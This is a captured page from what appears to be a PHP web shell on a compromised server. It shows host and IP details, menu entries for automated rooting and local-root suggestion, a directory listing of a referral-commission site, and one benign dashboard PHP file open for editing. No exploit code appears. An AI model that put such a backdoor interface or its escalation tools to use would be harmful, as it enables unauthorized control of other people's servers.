Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
assignment.work.zone /
user /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
AssignmentWorkZone.apk
19.5
MB
-rw-r--r--
2026-03-28 16:09
assignment.php
20.18
KB
-rw-r--r--
2026-03-31 10:04
checkout.php
10.61
KB
-rw-r--r--
2026-03-13 17:01
dashboard.php
10.53
KB
-rw-r--r--
2026-03-31 10:21
history.php
3.6
KB
-rw-r--r--
2026-03-12 12:52
logout.php
91
B
-rw-r--r--
2026-03-11 23:27
pending.php
4.56
KB
-rw-r--r--
2026-03-12 01:29
plan-current.php
2.55
KB
-rw-r--r--
2026-03-11 23:27
profile.php
5.04
KB
-rw-r--r--
2026-03-28 15:45
referral-commissions.php
6.07
KB
-rw-r--r--
2026-03-12 00:37
referral.php
8.61
KB
-rw-r--r--
2026-03-28 15:31
select-plan.php
3.4
KB
-rw-r--r--
2026-03-11 23:27
support.php
12.43
KB
-rw-r--r--
2026-03-12 13:23
team-commission.php
2.82
KB
-rw-r--r--
2026-03-12 12:52
team-details.php
4.46
KB
-rw-r--r--
2026-03-12 15:31
withdraw-history.php
3.53
KB
-rw-r--r--
2026-03-12 12:52
withdraw.php
8.18
KB
-rw-r--r--
2026-03-12 15:18
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php require_once '../includes/config.php'; require_once '../includes/header_dashboard.php'; require_once '../includes/sidebar.php'; // Ensure user is loaded $stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?"); $stmt->execute([$_SESSION['user_id']]); $user = $stmt->fetch(); if (!$user || $user['status'] != 'active') { header("Location: ../login.php"); exit; } // Fetch Referral Commissions from Transactions table $stmt = $pdo->prepare("SELECT * FROM transactions WHERE user_id = ? AND type = 'referral_commission' ORDER BY created_at DESC"); $stmt->execute([$user['id']]); $commissions = $stmt->fetchAll(); // Total Commission Calculation $total_commission = 0; foreach ($commissions as $c) $total_commission += $c['amount']; ?> <div style="display:flex; justify-content:space-between; align-items:center; margin-bottom:30px;"> <h2>Team Commissions</h2> <div style="background:var(--primary-color); padding:10px 20px; border-radius:8px; color:#fff; font-weight:700;"> Total: Rs <?php echo number_format($total_commission, 2); ?> </div> </div> <div class="card" style="padding:0; overflow:hidden;"> <div style="max-height: 400px; overflow-y: auto; overflow-x: auto; padding-right: 5px;" class="custom-scrollbar"> <table class="admin-table"> <thead style="position: sticky; top: 0; z-index: 10; background: var(--card-bg-dark);"> <tr> <th>Description</th> <th>Amount</th> <th>Date</th> <th>Type</th> </tr> </thead> <tbody> <?php if (count($commissions) > 0): ?> <?php foreach ($commissions as $c): ?> <tr> <td style="font-weight:600;"><?php echo htmlspecialchars($c['description']); ?></td> <td style="font-weight:700; color:#2ecc71;">+ Rs <?php echo number_format($c['amount'], 2); ?></td> <td style="font-size:0.85rem; color:var(--text-muted);"> <?php echo date('d M Y, h:i A', strtotime($c['created_at'])); ?> </td> <td><span class="badge badge-success">Commission</span></td> </tr> <?php endforeach; ?> <?php else: ?> <tr> <td colspan="4" style="text-align:center; padding:50px; color:var(--text-muted);"> No referral commissions earned yet. Encourage your team to grow! </td> </tr> <?php endif; ?> </tbody> </table> </div> </div> <?php require_once '../includes/footer_dashboard.php'; ?>